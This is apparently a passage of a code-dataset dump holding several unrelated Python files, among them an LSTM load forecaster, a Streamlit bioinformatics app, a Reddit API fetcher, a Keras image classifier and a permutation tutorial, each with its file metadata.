True\n","sub_path":"solinv/environment/invariant_heuristic.py","file_name":"invariant_heuristic.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"521647076","text":"import pandas as pd \r\nimport numpy as np \r\nimport matplotlib.pyplot as plt \r\nfrom sklearn.preprocessing import MinMaxScaler \r\nfrom tensorflow.keras.layers import Dense,Dropout,LSTM \r\nfrom tensorflow.keras.models import Sequential \r\nfrom tensorflow.keras.optimizers import Adam \r\nfrom 
tensorflow.keras.activations import relu,linear \r\nscale = MinMaxScaler(feature_range = (0,1))\r\n\r\ndf = pd.read_csv(\"a_zone.csv\")\r\ndf = df.drop(df[[\"Unnamed: 0\"]],axis = 1)\r\ndf = df.fillna(method = 'ffill')\r\n\r\ntraining_set = df[:-12]\r\n\r\ntest_set = df[-12:]\r\n\r\ntraining_set_scaled = scale.fit_transform(training_set)\r\ntest_set_scaled = scale.fit_transform(test_set)\r\n\r\nX_train = [] \r\ny_train = [] \r\n\r\ntotal_data_scaled = scale.fit_transform(df)\r\n\r\nfor x in range(12,len(total_data_scaled)): \r\n X_train.append(total_data_scaled[x-12:x])\r\n y_train.append(total_data_scaled[x])\r\n \r\nX_train = np.array(X_train)\r\ny_train = np.array(y_train)\r\n\r\n\r\n\r\nkva = Sequential() \r\n\r\nkva.add(LSTM(units = 150,input_shape = (X_train.shape[1],1) ,activation = relu,return_sequences = True \r\n ))\r\n\r\nkva.add(Dropout(0.5))\r\n\r\nkva.add(LSTM(units = 50,activation = relu,return_sequences = True \r\n ))\r\n\r\nkva.add(Dropout(0.5))\r\n\r\nkva.add(LSTM(units = 50,activation = relu,\r\n return_sequences = False\r\n ))\r\n\r\nkva.add(Dropout(0.5))\r\nkva.add(Dense(units = 1,activation = linear))\r\n\r\nkva.compile(optimizer = \"adam\",loss = \"mean_squared_error\")\r\n\r\nkva.fit(X_train,y_train,epochs = 100,batch_size = 12)\r\n\r\nbatch = training_set_scaled[-12:].reshape(1,12,1)\r\n\r\ntime = 48\r\n\r\npred_kva = []\r\n\r\n\r\nfor x in range(0,time):\r\n kv = kva.predict(batch)\r\n pred_kva.append(scale.inverse_transform(kv))\r\n batch = np.append(batch[:,1:,:],kv.reshape(1,1,1))\r\n batch = batch.reshape(1,12,1)\r\n \r\n\r\n\r\n\r\n\r\ndf_date = pd.date_range('2013/9/1',periods = 76,freq = \"M\")\r\n\r\ndf_date_pred = pd.date_range('2019/1/1',periods = time,freq = \"M\")\r\n\r\ndf_p = pd.DataFrame()\r\n\r\n\r\n \r\nfor x in range(0,len(pred_kva)):\r\n slime = pd.DataFrame(pred_kva[x],columns = [\"predicted_units\"])\r\n df_p = pd.concat([df_p,slime],axis = 0)\r\n\r\n\r\nplt.plot(df_date,df,color = 'blue')\r\n\r\nplt.plot(df_date_pred,df_p,color = 'black')\r\n\r\nplt.title(\"predicted_a_zone\")\r\n\r\nplt.show()\r\n\r\n\r\n\r\n","sub_path":"Electrical Load Forecasting/a_zone.py","file_name":"a_zone.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"2043943","text":"from __future__ import division\n\nimport cv2\n\nfrom CrystalMatch.dls_util.shape import Point\nfrom CrystalMatch.dls_util.imaging import Image, Color\n\n\nclass MatchPainter:\n \"\"\" Creates images illustrating the results of the feature match process. 
The resulting image shows the two\n    images side-by-side with lines drawn between them indicating the matches.\n\n    In addition, the image can contain the location of a point in image1 with its corresponding transform in\n    image 2 as well as a rectangle from image 1 with its corresponding transformed shape in image 2.\n    \"\"\"\n    DEFAULT_IMAGE_SIZE = 900\n    DEFAULT_PADDING = 5\n    DEFAULT_BACK_COLOR = Color.black()\n\n    IMAGE_1 = 1\n    IMAGE_2 = 2\n\n    def __init__(self, image1, image2):\n        self._image1 = image1\n        self._image2 = image2\n\n        self._image1_position = Point(0, 0)\n        self._image2_position = Point(0, 0)\n        self._scale_factor = 1\n        self._background_image = None\n\n        self._image_size = self.DEFAULT_IMAGE_SIZE\n        self._padding = self.DEFAULT_PADDING\n        self._back_color = self.DEFAULT_BACK_COLOR\n\n        self._create_background_image()\n\n    # -------- CONFIGURATION -------------------\n    def set_image_size(self, size):\n        \"\"\" Set the maximum size of the background image (should be a Point instance). \"\"\"\n        self._image_size = size\n        self._create_background_image()\n\n    def set_padding(self, padding):\n        \"\"\" Set the number of pixels of padding between images 1 and 2 in the background image. \"\"\"\n        self._padding = padding\n        self._create_background_image()\n\n    def set_back_color(self, color):\n        \"\"\" Set the background color. \"\"\"\n        self._back_color = color\n        self._create_background_image()\n\n    # -------- FUNCTIONALITY -------------------\n    def background_image(self):\n        \"\"\" Get the background image (images 1 and 2 side-by-side) without any other markings (e.g. matches, etc.)\"\"\"\n        return self._background_image.copy()\n\n    def _create_background_image(self):\n        \"\"\" Create the background image, which consists of the two images side-by-side with a colored backdrop.\n        This must be recreated if the image size, padding, or background color changes. \"\"\"\n        self._calculate_image_positions()\n\n        w, h = self._calculate_background_image_size()\n        image = Image.blank(w, h)\n        image.paste(self._image1, self._image1_position)\n        image.paste(self._image2, self._image2_position)\n\n        image, factor = self._rescale_to_max_size(image)\n        self._background_image = image\n        self._scale_factor = factor\n\n    def _calculate_image_positions(self):\n        \"\"\" Determine the positions of images 1 and 2 in the background image. \"\"\"\n        pad = self._padding\n        w1, h1 = self._image1.size()\n        w2, h2 = self._image2.size()\n\n        if h2 > h1:\n            self._image1_position += Point(0, pad + 0.5 * (h2 - h1))\n        elif h1 > h2:\n            self._image2_position += Point(0, pad + 0.5 * (h1 - h2))\n\n    def _calculate_background_image_size(self):\n        \"\"\" Determine the sizes of images 1 and 2 as displayed in the background image. \"\"\"\n        pad = self._padding\n        w1, h1 = self._image1.size()\n        w2, h2 = self._image2.size()\n\n        w_bg = w1 + w2 + 3 * pad\n        h_bg = 2 * pad + max(h1, h2)\n        return w_bg, h_bg\n\n    def _rescale_to_max_size(self, image):\n        \"\"\" Resize the background image so that it fills up the maximum available space. \"\"\"\n        width, height = image.size()\n        factor = self._image_size / max(width, height)\n        rescaled = image.rescale(factor)\n        return rescaled, factor\n\n    def draw_transform_points(self, image1_point, image2_point, image=None):\n        \"\"\" Draw a cross at a point on image 1 and the corresponding transformed point on image 2. 
\"\"\"\n if image is None:\n image = self._background_image.copy()\n\n if image1_point is not None:\n point1 = self._point_to_image_coords(image1_point, 1)\n image.draw_cross(point1, Color.green(), size=10, thickness=2)\n\n if image2_point is not None:\n point2 = self._point_to_image_coords(image2_point, 2)\n image.draw_cross(point2, Color.green(), size=10, thickness=2)\n\n return image\n\n def draw_transform_shapes(self, shape1, shape2, image=None):\n \"\"\" Draw a shape on image 1 and the corresponding transformed shape on image 2. \"\"\"\n if image is None:\n image = self._background_image.copy()\n\n self._draw_shape(shape1, self.IMAGE_1, image)\n self._draw_shape(shape2, self.IMAGE_2, image)\n return image\n\n def _draw_shape(self, shape, image_num, image):\n \"\"\" Draw a polygon on the specified image. \"\"\"\n if shape is not None:\n shape = self._polygon_to_image_coords(shape, image_num)\n for edge in shape.edges():\n image.draw_line(edge[0], edge[1], Color.orange(), thickness=2)\n\n def draw_matches(self, matches, highlight_matches=[], image=None):\n \"\"\" Draw lines for each of the matches between the respective points in the two images.\n Matches that are marked as included in the transformation will be colored blue whereas\n those not included will be alight grey. Highlighted matches will appear in yellow\n \"\"\"\n if image is None:\n image = self._background_image.copy()\n\n for match in matches:\n color = Color.blue() if match.is_in_transformation() else Color.slate_gray()\n self._draw_match(image, match, color, thickness=1, radius=4)\n\n for match in highlight_matches:\n self._draw_match(image, match, Color.yellow(), thickness=2, radius=4)\n color = Color.blue() if match.is_in_transformation() else Color.slate_gray()\n self._draw_match(image, match, color, thickness=1, radius=4)\n\n return image\n\n def _draw_match(self, image, match, color, thickness, radius):\n \"\"\" Draw a single match on the image pair. \"\"\"\n point1 = self._point_to_image_coords(match.image_point1(), 1)\n point2 = self._point_to_image_coords(match.image_point2(), 2)\n\n # Draw a small circle at both co-ordinates\n image.draw_circle(point1, radius, color, thickness)\n image.draw_circle(point2, radius, color, thickness)\n\n # Draw a line between the two points\n image.draw_line(point1, point2, color, thickness)\n\n def _point_to_image_coords(self, point, image_num):\n \"\"\" Convert a point on image 1 or 2 to a coordinate in the background image. \"\"\"\n image_position = self._get_image_position(image_num)\n return (point + image_position) * self._scale_factor\n\n def _polygon_to_image_coords(self, polygon, image_num):\n \"\"\" Convert a polygon on image 1 or 2 to a polygon in the background image. \"\"\"\n image_position = self._get_image_position(image_num)\n return polygon.offset(image_position).scale(self._scale_factor)\n\n def _get_image_position(self, num):\n \"\"\" Get the position of the specified image. \"\"\"\n return self._image2_position if num == self.IMAGE_2 else self._image1_position\n\n @staticmethod\n def draw_keypoints(image, keypoints):\n \"\"\" Draw the list of keypoints to the specified image and display it as a popup window. 
\"\"\"\n marked_image = cv2.drawKeypoints(image.raw(), keypoints, flags=cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n return Image(marked_image)\n","sub_path":"CrystalMatch/dls_imagematch/feature/draw/matches.py","file_name":"matches.py","file_ext":"py","file_size_in_byte":7636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"525328808","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport torch\nimport pandas as pd\nimport os\n\nimport learn2predict as l2p\n# Use the device defined in learn2predict (should be the GPU with the most free memory)\ndevice = l2p.device\n\nsimDir = \"./sim_data\"\npredictor_name = \"flam\"\n\nnum_mc = 2000\n\ngam = True\nM = 10\nwdim = 10\n\ndf = pd.read_csv(os.path.join(simDir,predictor_name+\"_performance.csv\"),dtype={'scenario':np.int,'est':object,'n':np.int,'s':np.int,'mse':np.float,'se':np.float})\n\nfor n_metatrain in [100,500]:\n for s in [1,5]:\n if gam:\n Pi, Pi_opt, Pi_sched = l2p.initPi(s,s+2,wdim,M=M,gam=gam)\n rank_based = True\n else:\n Pi, Pi_opt, Pi_sched = l2p.initPi(s,s+2,wdim,gam=gam)\n rank_based = False\n\n # initialize the procedure\n T, T_opt, T_sched = l2p.initT(rank_based=rank_based,gam=gam)\n\n fn_main = './estimators/'+(('Gam' + '_m' + str(M)) if gam else ('Linear')) + '_n' + str(n_metatrain) + '_s' + str(s) + '_wdim' + str(wdim)\n iteration, loss_list = l2p.load_model(T, T_opt, T_sched, Pi, Pi_opt, Pi_sched, fn_main+'.tar', fl_backup = fn_main+'_backup.tar')\n for scenario in [1,2,3,4]:\n for n in [100,500]:\n print((\"n_metatrain:\",n_metatrain,\"s:\",s,\"scenario\",scenario,\"n\",n))\n losses = torch.zeros(num_mc)\n for i in range(num_mc):\n w = torch.tensor(pd.read_csv(os.path.join(simDir,\"flam_\"+str(scenario), \"w_n\"+str(n)+\"_s\"+str(s)+\"_mcrep\"+str(i)+\".csv\")).values,device=device,dtype=torch.float)\n y = torch.tensor(pd.read_csv(os.path.join(simDir,\"flam_\"+str(scenario), \"y_n\"+str(n)+\"_s\"+str(s)+\"_mcrep\"+str(i)+\".csv\")).values,device=device,dtype=torch.float)\n w_tilde = torch.tensor(pd.read_csv(os.path.join(simDir,\"flam_\"+str(scenario), \"w_tilde_n\"+str(n)+\"_s\"+str(s)+\"_mcrep\"+str(i)+\".csv\")).values,device=device,dtype=torch.float)\n regfun = torch.tensor(pd.read_csv(os.path.join(simDir,\"flam_\"+str(scenario), \"regfun_n\"+str(n)+\"_s\"+str(s)+\"_mcrep\"+str(i)+\".csv\")).values,device=device,dtype=torch.float)\n\n T_out = T(w_tilde,w,y).squeeze().detach()\n # T_out_neg = -T(w_tilde,w,-y).squeeze().detach()\n # T_out_sym = (T_out + T_out_neg)/2\n\n # losses[i] = ((T_out_sym - regfun.squeeze())**2).mean()\n losses[i] = ((T_out - regfun.squeeze())**2).mean()\n \n df = df.append(pd.DataFrame({\"scenario\":[np.int(scenario)],\n \"est\":[\"AMC\"+str(n_metatrain)],\n \"n\":[np.int(n)],\n \"s\":[np.int(s)],\n \"mse\":[np.float(losses.mean().cpu().numpy())],\n \"se\":[np.sqrt(np.float((losses.var()/losses.size()[0]).cpu().numpy()))]}))\n \ndf = df.sort_values(by=['s', 'scenario', 'n'])\ndf.to_csv('tables/flam_results_all.csv', index=False)\ndf.round(2).to_csv('tables/flam_results_all_rounded.csv', index=False)\n","sub_path":"eval_flam_final.py","file_name":"eval_flam_final.py","file_ext":"py","file_size_in_byte":3170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"32524344","text":"#!/usr/bin/python3\n\"\"\"\nQuerie Reddit API\n\"\"\"\nimport requests\nheaders = {\"User-Agent\": \"ubuntu:hbtn:v1.0 (by /u/Tristan_001)\"}\n\n\ndef recurse(subreddit, hot_list=[], after=None):\n url = 
\"https://www.reddit.com/r/{}/hot.json?after={}\"\\\n .format(subreddit, after)\n request = requests.get(url, headers=headers, allow_redirects=False)\n\n if request.status_code == 200:\n for children in request.json().get(\"data\").get(\"children\"):\n hot_list.append(children.get(\"data\").get(\"title\"))\n\n after = request.json().get(\"data\").get(\"after\")\n if not after:\n return hot_list\n return recurse(subreddit, hot_list, after)\n\n else:\n return None\n","sub_path":"0x16-api_advanced/2-recurse.py","file_name":"2-recurse.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"419989742","text":"import streamlit as st\r\nimport streamlit.components.v1 as components\r\nimport matplotlib.pyplot as plt \r\nimport matplotlib\r\nmatplotlib.use(\"Agg\")\r\nfrom Bio.Seq import Seq \r\nfrom Bio import SeqIO\r\nfrom collections import Counter\r\nimport neatbio.sequtils as utils\r\nimport numpy as np \r\nfrom PIL import Image \r\nimport requests as req\r\nfrom stmol import component_3dmol\r\nimport kinetics\r\nimport pubchempy as pcp\r\nfrom pubchempy import get_compounds, Compound\r\n\r\n\r\ndef delta(x,y):\r\n return 0 if x == y else 1\r\n\r\n\r\ndef M(seq1,seq2,i,j,k):\r\n return sum(delta(x,y) for x,y in zip(seq1[i:i+k],seq2[j:j+k]))\r\n\r\n\r\ndef makeMatrix(seq1,seq2,k):\r\n n = len(seq1)\r\n m = len(seq2)\r\n return [[M(seq1,seq2,i,j,k) for j in range(m-k+1)] for i in range(n-k+1)]\r\n\r\n\r\ndef plotMatrix(M,t, seq1, seq2, nonblank = chr(0x25A0), blank = ' '):\r\n print(' |' + seq2)\r\n print('-'*(2 + len(seq2)))\r\n for label,row in zip(seq1,M):\r\n line = ''.join(nonblank if s < t else blank for s in row)\r\n print(label + '|' + line)\r\n\r\n\r\ndef dotplot(seq1,seq2,k = 1,t = 1):\r\n M = makeMatrix(seq1,seq2,k)\r\n plotMatrix(M, t, seq1,seq2) #experiment with character choice\r\n\r\n\r\n# Convert to Fxn\r\ndef dotplotx(seq1,seq2):\r\n plt.imshow(np.array(makeMatrix(seq1,seq2,1)))\r\n # on x-axis list all sequences of seq 2\r\n xt=plt.xticks(np.arange(len(list(seq2))),list(seq2))\r\n # on y-axis list all sequences of seq 1\r\n yt=plt.yticks(np.arange(len(list(seq1))),list(seq1))\r\n plt.show()\r\n\r\n\r\ndef gc_content(seq):\r\n result = float(str(seq).count('G') + str(seq).count('C'))/len(seq) * 100\r\n return result\r\n\r\ndef at_content(seq):\r\n result = float(str(seq).count('A') + str(seq).count('T'))/len(seq) * 100\r\n return result\r\n\r\n\r\n\r\ndef main():\r\n st.title(\"Bioinformatics App\")\r\n st.set_option('deprecation.showfileUploaderEncoding', False)\r\n\r\n activity = ['Intro','SequenceAnalysis','DotPlot','ProteinSearch',\"MoleculeVisualizer\", \"ChemicalSearch\"]\r\n choice = st.sidebar.selectbox(\"Select Activity\",activity)\r\n if choice == 'Intro':\r\n st.subheader(\"Intro\")\r\n st.write(\"\"\" This is a bioinformatics web app made with Python and Streamlit. 
Use the left panel dropdown to choose the various features to use.\"\"\")\r\n image = Image.open(\"overviewpicture.png\")\r\n st.image(image, use_column_width=True)\r\n\r\n elif choice == \"SequenceAnalysis\":\r\n st.subheader(\"DNA Sequence Analysis\")\r\n\r\n seq_file = st.file_uploader(\"Upload FASTA File\",type=[\"fasta\",\"fa\"])\r\n\r\n if seq_file is not None:\r\n dna_record = SeqIO.read(seq_file,\"fasta\")\r\n # st.write(dna_record)\r\n dna_seq = dna_record.seq\r\n\r\n details = st.radio(\"Details\",(\"Description\",\"Sequence\"))\r\n if details == \"Description\":\r\n st.write(dna_record.description)\r\n elif details == \"Sequence\":\r\n st.write(dna_record.seq)\r\n\r\n\r\n # Nucleotide Frequencies\r\n st.subheader(\"Nucleotide Frequency\")\r\n dna_freq = Counter(dna_seq)\r\n st.write(dna_freq)\r\n adenine_color = st.beta_color_picker(\"Adenine Color\")\r\n thymine_color = st.beta_color_picker(\"thymine Color\")\r\n guanine_color = st.beta_color_picker(\"Guanine Color\")\r\n cytosil_color = st.beta_color_picker(\"cytosil Color\")\r\n\r\n if st.button(\"Plot Freq\"):\r\n barlist = plt.bar(dna_freq.keys(),dna_freq.values())\r\n barlist[2].set_color(adenine_color)\r\n barlist[3].set_color(thymine_color)\r\n barlist[1].set_color(guanine_color)\r\n barlist[0].set_color(cytosil_color)\r\n\r\n st.pyplot()\r\n\r\n st.subheader(\"DNA Composition\")\r\n gc_score = utils.gc_content(str(dna_seq))\r\n at_score = utils.at_content(str(dna_seq))\r\n st.json({\"GC Content\":gc_score,\"AT Content\":at_score})\r\n\r\n # Nucleotide Count\r\n nt_count = st.text_input(\"Enter Nucleotide Here\",\"Type Nucleotide Alphabet\")\r\n st.write(\"Number of {} Nucleotide is ::{}\".format((nt_count),str(dna_seq).count(nt_count)))\r\n\r\n # Protein Synthesis\r\n st.subheader(\"Protein Synthesis\")\r\n p1 = dna_seq.translate()\r\n aa_freq = Counter(str(p1))\r\n\r\n if st.checkbox(\"Transcription\"):\r\n st.write(dna_seq.transcribe())\r\n\r\n elif st.checkbox(\"Translation\"):\r\n st.write(dna_seq.translate())\r\n\r\n elif st.checkbox(\"Complement\"):\r\n st.write(dna_seq.complement())\r\n\r\n elif st.checkbox(\"AA Frequency\"):\r\n st.write(aa_freq)\r\n\r\n elif st.checkbox(\"Plot AA Frequency\"):\r\n aa_color = st.beta_color_picker(\"Pick An Amino Acid Color\")\r\n # barlist = plt.bar(aa_freq.keys(),aa_freq.values(),color=aa_color)\r\n # barlist[2].set_color(aa_color)\r\n plt.bar(aa_freq.keys(),aa_freq.values(),color=aa_color)\r\n st.pyplot()\r\n\r\n elif st.checkbox(\"Full Amino Acid Name\"):\r\n aa_name = str(p1).replace(\"*\",\"\")\r\n aa3 = utils.convert_1to3(aa_name)\r\n st.write(aa_name)\r\n st.write(\"=====================\")\r\n st.write(aa3)\r\n\r\n st.write(\"=====================\")\r\n st.write(utils.get_acid_name(aa3))\r\n \r\n elif choice == \"ProteinSearch\":\r\n st.subheader(\"Search for Papers Related to a Protein\")\r\n st.write(\"\"\" Try entering ACE2 and coronavirus!\"\"\")\r\n\r\n ace2 = st.text_input(\"Query Protein\")\r\n disease = st.text_input(\"Query Specifier (more specific thing to narrow down papers with)\")\r\n\r\n if ace2 and disease is not None:\r\n protein = req.get('https://www.ebi.ac.uk/proteins/api/proteins?offset=0&size=10&gene='+ace2+'&organism=homo%20sapiens', headers = {'Accept':\"application/json\"})\r\n for i,v in enumerate(protein.json()[0]['references']):\r\n counter = 1\r\n try:\r\n title = protein.json()[0]['references'][i]['citation']['title']\r\n if counter ==10:\r\n break\r\n \r\n if title.find(disease) != -1:\r\n st.write(title)\r\n counter +=1\r\n except:\r\n 
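# skip references whose citation entry has no title (the lookup above may raise)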
pass\r\n \r\n elif choice == \"DotPlot\":\r\n st.subheader(\"Generate Dot Plot For Two Sequences\")\r\n seq_file1 = st.file_uploader(\"Upload 1st FASTA File\",type=[\"fasta\",\"fa\"])\r\n seq_file2 = st.file_uploader(\"Upload 2nd FASTA File\",type=[\"fasta\",\"fa\"])\r\n\r\n if seq_file1 and seq_file2 is not None:\r\n dna_record1 = SeqIO.read(seq_file1,\"fasta\")\r\n dna_record2 = SeqIO.read(seq_file2,\"fasta\")\r\n # st.write(dna_record)\r\n dna_seq1 = dna_record1.seq\r\n dna_seq2 = dna_record2.seq\r\n\r\n details = st.radio(\"Details\",(\"Description\",\"Sequence\"))\r\n if details == \"Description\":\r\n st.write(dna_record1.description)\r\n st.write(\"=====================\")\r\n st.write(dna_record2.description)\r\n elif details == \"Sequence\":\r\n st.write(dna_record1.seq)\r\n st.write(\"=====================\")\r\n st.write(dna_record2.seq)\r\n\r\n\r\n cus_limit = st.number_input(\"Select Max number of Nucleotide\",10,200,50)\r\n if st.button(\"Dot Plot\"):\r\n st.write(\"Comparing the first {} Nucleotide of the Two Sequences\".format(cus_limit))\r\n dotplotx(dna_seq1[0:cus_limit],dna_seq2[0:cus_limit])\r\n\r\n st.pyplot()\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n elif choice == \"MoleculeVisualizer\":\r\n st.subheader(\"Look at a molecule! Pre-loaded example is the Covid-19 Spike Protein. Thank you to: https://github.com/napoles-uach/streamlit_3dmol\")\r\n\r\n component_3dmol()\r\n \r\n elif choice == \"ChemicalSearch\":\r\n st.title(\"Search for chemicals and get info. Pre-loaded example: imatinib\")\r\n user_compound = st.text_input(\"Enter compound name\", 'imatinib')\r\n if user_compound is not None:\r\n results = pcp.get_compounds(user_compound,'name')\r\n for compound in results:\r\n st.write('Compound ID: '+ str(compound.cid))\r\n st.write('SMILES: '+compound.isomeric_smiles)\r\n \r\n vioxx = Compound.from_cid(compound.cid)\r\n st.write('Molecular Formula: '+vioxx.molecular_formula)\r\n st.write('Molecular Weight: '+str(vioxx.molecular_weight))\r\n st.write('IUPAC Name: '+vioxx.iupac_name)\r\n st.write('xlogp value: '+str(vioxx.xlogp))\r\n \r\n \r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"penguins-app.py","file_name":"penguins-app.py","file_ext":"py","file_size_in_byte":8912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"611128281","text":"\n\"\"\"\nProblem Statement\nGiven a string, write a function that uses recursion to output a list of all the possible permutations of that string.\n\nFor example, given s='abc' the function should return ['abc', 'acb', 'bac', 'bca', 'cab', 'cba']\n\nNote: If a character is repeated, treat each occurence as distinct, for example an input of 'xxx' would return a list with 6 \"versions\" of 'xxx'\n\n\"\"\"\ndef permute(s):\n \n out = []\n \n #base case\n if len(s) == 1:\n out = [s]\n \n else: \n for i,letter in enumerate(s): \n for perm in permute(s[:i] + s[i+1:]):\n out += [letter+perm]\n \n return out\n\n\n\"\"\"\niterations:\n1. abc @ a permute(bc) # ab because s[:i] + s[i+1:] of abc at a is bc\n bc @ b permute(c)\n returns c # cos len = 1\n out = b+c\n out += a + bc #(['abc'])\n \n bc @ c permute(b)\n returns b # cos len = 1\n out += [cb]\n out += a + cb #(['abc','acb'])\n\n\n2. 
abc @ b permute(ac) # ab because s[:i] + s[i+1:] of abc at b is ac\n ac @ a permute(c) #hitting c here, because s[:i] + s[i+1:] of ac at a is c.\n returns c # cos len = 1\n out = a+c\n out += b + ac #(['abc','acb','bac'])\n\n ac @ c permute(a) #hitting a here because because s[:i] + s[i+1:] of ac at c is a. (s[i+1: would be null])\n returns a # cos len = 1\n out = c + a\n out += b + ca #(['abc','acb','bac','bca'])\n\n3. abc @ c permute(ab) # ab because s[:i] + s[i+1:] of abc at c is ab\n ab @ a permute(b) # hitting b here because s[:i] + s[i+1:] of ab at a is b\n returns b # cos len = 1\n out = a + b\n out += c + ab #(['abc','acb','bac','bca','cab'])\n\n ab @ b permute(a) # hitting a here because s[:i] + s[i+1:] of ab at b is a\n returns a # cos len = 1\n out = b + a\n out += c + ba #(['abc','acb','bac','bca'])\n\n\n\n\"\"\"\n\n\nprint(permute(\"abc\"))","sub_path":"basic/permutate.py","file_name":"permutate.py","file_ext":"py","file_size_in_byte":2272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"362278948","text":"# -----------------------------------------------------------------------------\n# Copyright (c) 2015-2018, The dartpy development contributors\n# All Rights Reserved.\n# Distributed under the BSD 2-Clause License. See LICENSE for more info.\n# -----------------------------------------------------------------------------\n\nfrom vispy import app\nfrom vispy import scene\n\nfrom dart.gui.vispy.world_node import WorldNode\n\n\nclass Viewer(scene.SceneCanvas):\n def __init__(self, world, title='Noname', show=True):\n if world is None:\n raise ValueError(\"World is None.\")\n\n super().__init__(title=title, keys='interactive', size=(800, 550), show=show)\n\n self.unfreeze()\n\n self.viewBox = self.central_widget.add_view()\n self.viewBox.bgcolor = '#efefef'\n self.viewBox.camera = 'arcball'\n self.viewBox.camera.fov = 50\n # self.viewBox.camera.distance = 1\n self.viewBox.padding = 0\n\n self.axis = scene.visuals.XYZAxis(parent=self.viewBox.scene)\n\n self.world = None\n self.worldNode = None\n\n self.freeze()\n\n self.setWorld(world)\n\n self.unfreeze()\n self.events.key_press.connect(self.on_key_press)\n\n self.timer = app.Timer('auto', self.on_timer)\n self.timer.start()\n self.freeze()\n\n def on_timer(self, _):\n self.update()\n\n def on_draw(self, event):\n self._refreshWorldNode()\n\n super().on_draw(event=event)\n\n def on_key_press(self, event):\n if event.key.name == 'S':\n self.unfreeze()\n self.show(True)\n self.freeze()\n if event.key.name == 'H':\n self.unfreeze()\n self.show(False)\n self.freeze()\n print('\\'{}\\' key pressed'.format(event.key.name))\n\n def _refreshWorldNode(self):\n if not self.worldNode:\n return\n self.worldNode.refresh()\n\n def setWorld(self, world):\n if self.world == world:\n return\n\n self.unfreeze()\n self.world = world\n self.freeze()\n\n if not self.world:\n return\n\n self.unfreeze()\n self.worldNode = WorldNode(self.world, parent=self.viewBox.scene)\n self.freeze()\n\n def getFrame(self):\n temp = self.render()\n print('getFrame()')\n return temp\n\n def startSimulation(self):\n self.unfreeze()\n self.worldNode = WorldNode(self.world, parent=self.viewBox.scene)\n self.freeze()\n","sub_path":"dart/gui/vispy/viewer.py","file_name":"viewer.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"640270507","text":"# Make sure set in appropriate working directory\n\n# Make sure tensorflow 
and keras are installed\n\n# Importing the Keras libraries and packages\nfrom keras.models import Sequential\nfrom keras.layers import Conv2D\nfrom keras.layers import MaxPooling2D\nfrom keras.layers import Flatten\nfrom keras.layers import Dense\n\n# Initialising the CNN\nclassifier = Sequential()\n\n# Convolution\nclassifier.add(Conv2D(filters = 64, kernel_size = (3, 3), activation = 'relu', input_shape = (32, 32, 1)))\n\n# Max Pooling\nclassifier.add(MaxPooling2D(pool_size = (2, 2)))\n\n# Adding more convolutional layers and max pooling\nclassifier.add(Conv2D(filters = 32, kernel_size = (2, 2), activation = 'relu'))\nclassifier.add(MaxPooling2D(pool_size = (2, 2)))\n\n# Flattening\nclassifier.add(Flatten())\n\n# Full Connection\nclassifier.add(Dense(units = 64, activation = 'relu'))\nclassifier.add(Dense(units = 46, activation = 'softmax'))\n\n# Compiling the CNN\nclassifier.compile(optimizer = 'adam', loss = 'categorical_crossentropy', metrics = ['accuracy'])\n\n# Fitting the CNN to the images\nfrom keras.preprocessing.image import ImageDataGenerator\n\ntrain_datagen = ImageDataGenerator(rescale = 1./255,\n                                   shear_range = 0.2,\n                                   zoom_range = 0.2,\n                                   horizontal_flip = True)\ntest_datagen = ImageDataGenerator(rescale = 1./255)\n\n# Creating Training and Test sets\ntraining_set = train_datagen.flow_from_directory('Train',\n                                                 target_size = (32, 32),\n                                                 batch_size = 32,\n                                                 color_mode = 'grayscale',\n                                                 class_mode = 'categorical')\ntest_set = test_datagen.flow_from_directory('Test',\n                                            target_size = (32, 32),\n                                            batch_size = 32,\n                                            color_mode = 'grayscale',\n                                            class_mode = 'categorical')\n\n# Training the classifier\nclassifier.fit_generator(training_set,\n                         steps_per_epoch = 2300,\n                         epochs = 34,\n                         validation_data = test_set,\n                         validation_steps = 6900)","sub_path":"Classification_code.py","file_name":"Classification_code.py","file_ext":"py","file_size_in_byte":2341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"6707182","text":"import transformers\nimport torch\nimport os\nimport json\nimport random\nimport numpy as np\nimport argparse\nfrom torch.utils.tensorboard import SummaryWriter\nfrom datetime import datetime, timedelta\nfrom tqdm import tqdm\nfrom torch.nn import DataParallel\nfrom tokenizations.bpe_tokenizer import get_encoder\n\ndef build_files(data_path, tokenized_data_path, num_pieces, full_tokenizer, min_length):\n    with open(data_path, 'r', encoding='UTF-8') as f:\n        print('Reading Lines')\n        lines = json.load(f)\n        # Replace newlines with [SEP]; [SEP] marks the end of a paragraph\n        lines = [line.replace('\\n', ' [SEP] ') for line in lines]\n        all_len = len(lines)\n\n    os.makedirs(tokenized_data_path, exist_ok=True)\n\n    show = []\n    for i in tqdm(range(num_pieces)):\n        sublines = lines[all_len // num_pieces * i: all_len // num_pieces * (i + 1)]\n        if i == num_pieces - 1:\n            # Fold the remaining examples into the last piece\n            sublines.extend(lines[all_len // num_pieces * (i + 1):])\n        # Keep only lines longer than min_length\n        sublines = [\n            full_tokenizer.tokenize(line) for line in sublines if len(line) > min_length]\n        show.append(random.choice(sublines))\n        sublines = [full_tokenizer.convert_tokens_to_ids(line) for line in sublines]\n        full_line = []\n        for subline in sublines:\n            # [MASK] marks the beginning of an article\n            full_line.append(full_tokenizer.convert_tokens_to_ids('[MASK]'))\n            full_line.extend(subline)\n            